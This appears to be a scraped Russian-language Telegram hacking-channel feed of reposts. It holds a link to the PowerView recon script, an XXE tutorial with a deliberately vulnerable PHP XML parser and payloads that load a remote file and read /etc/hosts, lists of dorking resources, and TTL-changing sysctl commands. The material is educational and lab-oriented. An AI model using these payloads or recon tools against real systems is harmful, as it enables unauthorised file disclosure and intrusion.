Разведка внутри системы используя PShell
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Post #430
286
SL @asleep_book
Forwarded from S.E.Book

Forwarded from Life-Hack - Хакер


Forwarded from S.E.Book
libxml_disable_entity_loader(false) позволяет загружать внешние объекты. simplexml_load_string с LIBXML_NOENT позволяет веб-приложению получать доступ к внутренним файлам системы.<?php
..
...
libxml_disable_entity_loader(false);
$wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT);
...
..
echo "Item added to your wishlist successfully.";
?>
&ext; может ссылаться на внешний файл, расположенный по адресу " http://eval.com/robots.txt", который будет загружен в XML:<!DOCTYPE people [
<!ENTITY ext SYSTEM "http://tryhackme.com/robots.txt">
]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>1</product_id>
</item>
</wishlist>
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>
Автоматизация Dorks запросов через внешние сервисы
1. Dorks Tool: "https://dorks.faisalahmed.me"
2. Bug Bounty SE: "https://nitinyadav00.github.io/Bug-Bounty-Search-Engine"
3. Google Dorks BBT: "https://taksec.github.io/google-dorks-bug-bounty"
- DuckDuckGo
1. Операторы: "https://duckduckgo.com/duckduckgo-help-pages/results/syntax/"
- Yandex
1. Операторы: "https://hackware.ru/?p=6045"
- GitHub Dorks
1. Скрипт: "https://github.com/techgaun/github-dorks"
2. Операнды: "https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets"
- Shoodan Dorks
1. Операнды: "https://github.com/lothos612/shodan"
Forwarded from S.E.Book
Forwarded from XATORI 👾
main.py911 BForwarded from WebGhost | Channel
Forwarded from Okita
sysctl net.ipv4.ip_default_ttl
Forwarded from Okita
sudo sysctl -w net.ipv4.ip_default_ttl=NEW_TTL_VALUE
Forwarded from darkside
list.txt16.3 KB